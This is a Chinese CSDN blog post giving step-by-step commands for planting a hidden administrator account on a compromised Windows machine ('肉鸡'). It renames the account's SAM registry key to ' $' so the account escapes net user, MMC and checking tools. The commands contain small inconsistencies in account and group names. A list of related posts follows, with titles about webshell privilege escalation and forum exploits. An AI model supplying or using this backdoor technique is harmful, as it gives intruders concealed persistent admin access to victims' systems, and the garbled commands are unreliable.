打造不完美的超级帐号(ALLyeSNO)

最新推荐文章于 2019-02-16 12:47:42 发布
最新推荐文章于 2019-02-16 12:47:42 发布
阅读量1.7k 收藏
点赞数
分类专栏: 木马后门 原创文章 注册表研究 文章标签: user 工具 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freexploit/article/details/233788
版权

FreeXploiT:ALLyeSNO

能够实现在 mmc 界面 net user 里面隐形

用工具检查的时候 检查到的第一次建立使用的用户名 查不到隐藏的用户名

有极大的危险性 用此方法改造注册表 造成的危害 本人概不负责

假设肉鸡上已经存在

administrator tesinternetuser

将tesinternetuser 改名为temp

net user tesinternetuser allyesno /add
net localgroup administrator tesinternetuser /add
修改注册表键值


HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/tesinternetuser

改为

HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/ $

将temp 改回原来名称 tesinternetuser

net user 只会显示 administrator tsinternetuser
mmc不会显示隐藏帐号
用工具检查只会检查出tsinternetuser 存在

登录的时候 用 " $" 登录(注:是空格$)

不完美的地方 用mmc枚举的时候会报告显示 找不到帐号

并且测试过程中发现使用这个帐号的时候 有一些应用程序会报错 例如天网

freexploit
关注
专栏目录
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
qq_43667702的博客
02-24 340
ALLyeSNO 优化版浩方 第二版 Ver 2007 06 15 清除广告 自动挤房间
bat版鸡鸡管理器 【ALLyeSNO
FreeXploiT
05-07 2415
Term   : FreeXploiT Author : ALLyeSNODate   : 2005-5-8仿照kevin1986的vb版肉肉管理器的bat版鸡鸡管理器kevin这个工具蛮好玩的,其中直接调用了mstsc文件引起了我的兴趣,采用的方式可以有以下几种1。vb有现成的终端连接控件,直接添加使用2。捕获mstsc的窗口再从mdb读取信息添加3。存在命令行的发送形式,以此调用如果要写bat
打造完美超级帐号
12-31 713
作者:allyesno   来自:http://www.ph4nt0m.org/能够实现在 mmc 界面 net user 里面隐形用工具检查的时候 检查到的第一次建立使用的用户名 查不到隐藏的用户名有极大的危险性 用此方法改造注册表 造成的危害 本人概不负责假设肉鸡上已经存在administrator tesinternetuser将tesinternetuser 改名为tempnet user
一个不使用goto循环的bat(ALLyeSNO)
FreeXploiT
02-21 1943
Term     : FreeXploiT Author : ALLyeSNODate      : 2005-2-21@echo offrem bulid by ALLyeSNOrem 2005-2-21rem 今晚肉鸡丢失 以此代码悼念clsrem IN_cmdline : for /l %i in (0,0,0) do set/p t=&&set|findstr "^t=fuck$"
枚举驱动器 (ALLyeSNO)
FreeXploiT
12-15 1438
FreeXploiT原创文章原理: if 命令不能用于直接测试目录,但空 (NUL) 设备确实存在于每个目录中。因此,可以通过测试零设备确定目录是否存在。以下范例可测试目录的存在:if exist c:mydir/nul goto process @echo offrem test in win2K&winXP by ALLyeSNOclsfor %%i in (C,D,E,F,G,H,I
梦(ALLyeSNO)
FreeXploiT
03-27 1375
文:ALLyeSNO昨天晚上又做梦了有趣的是 这梦是上个星期那梦的续集 听说有的人做了梦以后那是一点都想不起来的 我比较受伤一点我做的都嘛是感伤的梦梦的内容 就像一部神妙的小说 中间穿插着一个感情的故事 让我感伤的 却又是情现实中我对感情那是麻木了 却没想到在梦里重新拾回这揪心的感觉 是在梦里对现实的渴望?是现实中无法实现而要在梦中冲破枷锁 宣泄自己? 我清醒的否认 但潜意识或者正在对此点头昨晚还
PingX(ALLyeSNO)
FreeXploiT
10-15 1571
rem pingx.bat bulid by ALLyeSNO@echo offecho use:pingx windowsnumber ipecho ex:pingx 20 127.0.0.1if "%1"=="" echo 请输入你要打开的窗口数目&&goto :eofif "%2"=="" echo 你没有输入ip地址&&goto :eoffor /l %%i in (1,1,%1) do
CSDN 韩磊 外传 【ALLyeSNO
FreeXploiT
05-13 1914
话说 CSDN 的 韩磊 死后去了天堂,被上帝召去面试,说是让他主持天堂的 BLOG 系统开发工作,韩磊欣喜若狂很高兴,上帝问他:你智商有160吗?我们研究一下DONEWS BLOG,韩磊说没有;上帝又问:那么你智商有140吗?我们可以探讨一下MSN 空间,韩磊说没有;上帝有点失望,继续问:那么120有吗?我们讨论讨论新浪 也行啊,韩磊还是说没有;上帝没办法,继续问:100、100总有
不借助第三方程序 无需ie拨号 自动实现adsl拨号上网【ALLyeSNO
FreeXploiT
02-16 3723
以前我用的是路由内置的拨号程序,所以一打开路由就自动拨号上网了。后来回到家里面路由没有带回家,只好装了一个星空互联的拨号程序,不过那个垃圾实在是太占内存传闻还有溢出,于是我就采用了XP自带的pppoe 程序实现ADSL拨号上网,搜索了一下资料网上说的ADSL本机拨号上网,都是借助第三方的程序例如 RASPPPOE EnterNet 等有没有不借助第三方程序的方法呢 虽然老子的内存有
MD5加强验证 挑战王小云破解 【 ALLyeSNO
FreeXploiT
05-30 3909
Author : allyesnoTeam   : freexploitDate     : 2006-05-30做梦想到了一个加强md5验证的方法 醒来了赶紧测试一下地球人都知道MD5 被王小云破了!!!破了!!!破了!!!破了!!!破~~(shut up)其实不是破了而是用他们的算法,在数个小时内就可以找到MD5碰撞。就是你用一台IBM P690数小时内能创造出两个MD5相同 内容
用批处理实现文本文件中指定字符串的替换 zz
qq_43667702的博客
02-16 2042
用批处理实现文本文件中指定字符串的替换 zz
CMD下修改注册表 完全攻略(FreeXploiT搜集 整理 热荐)
FreeXploiT
11-26 2723
ALLyeSNO注:先来段精彩的【 本文未包含zzzevazzz 写的do all in cmd 里面使用inf 修改注册表的 方法 】regedit虽是gui下使用的东东 但其实是有未公开的参数的 可以在cmd下使用regedit的运行参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filenam
WEBSHELL权限提升(菜菜)
FreeXploiT
10-15 8667
动网上传漏洞,相信大家拿下不少肉鸡吧,但是都是WEBSHELL,不能拿到系统权限,要如何拿到系统权限呢?这正是我们这次要讨论的内容OK,进入我的WEBSHELL              啊哈,不错,双CPU,速度应该跟的上,不拿下你我怎么甘心啊输入密码,进入到里面看看,有什么好东西没有,翻了下,好像也没有什么特别的东西,看看能不能进到其他的盘符,点了下C盘,不错不错,可以进去,这样提升就大有希望
ALLyeSNO 优化版浩方 第二版 Ver:2007.06.15 清除广告 自动挤房间
FreeXploiT
06-15 8552
allyesno 优化版浩方 第二版 Ver:2007.06.15 正式发布ALLyeSNO优化版浩方 2007.06.151.按Ctrl+F1挤房间 按Ctrl+F2停止挤房间 (一般情况下会自动停止 无需按Ctrl+F2停止)2.可以挤浩方对战平台的任意房间,包括浩方大厅房间,浩方引擎房间,CS房间注:如果进去游戏后 再次挤房间 我只测试了反恐大联盟的CS版本 其他CS版本没有测试过 所以
FreeXploiT 成立三年感言!
FreeXploiT
01-11 8271
 04年成立的,和一个朋友,现在那个朋友不知所踪了(他叫菜菜,很早就玩汇编了)后来的两年基本是我一个人更新里面的blog我这个算是最早的安全聚合blog吧? 暗礁的也挺早 不过是团队形式的 鬼仔的05年 neeao的04.10.26我的04.10.15那时候就是想弄点资料自己收藏着看看 ,当然也有很长远的目标 就是想做一个网站 先拿blog练练手一练就是三年啊 哈。。blo
迅速删除非法文件名代码的 0day 呵呵
FreeXploiT
11-12 7722
allyesno:我们会遇到很多所谓非法的文件名例如 .. con nul 等等FlowerCode 给出了以下方法可以快速删除这些文件名http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html 两行代码搞定,迅速删除使用非法文件名的文件及文件夹  2007年06月04日 星期一 19:08
fuckipb batShell
FreeXploiT
04-29 6957
这个exploit是在0x557.cn irc room superhei 那里得知的 thx exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell 运行情况输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org输入网站地址:bbs.null.com输入论坛目录 例如 http://www.ph4
CMD记录器改良版
FreeXploiT
09-29 6676
 文章作者:a11yesno 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)改的不是很良 勉强可用 或许应该弄多一点容错代码 体力活啊。。安装 把代码保存为cmd.bat 放置system32下 把cmd.exe copy为cmd.gif 注册表 添加 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Curren
regini 可是一个好用强大的工具
FreeXploiT
01-18 6120
My site: http://blog.csdn.net/freexploit/regini 可是一个好用强大的工具!我仔细查阅了 微软的资料 发现说的含糊不清 google了下也是 寥寥几笔这个玩意主要用途是 在cmd下 修改注册表 以及 注册表权限!用法研究了一晚上 弄出来了 ,微软上写的 根本不能用啊 郁闷。。使用方法C:/>regini regset.ini 就行啦regset.ini
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值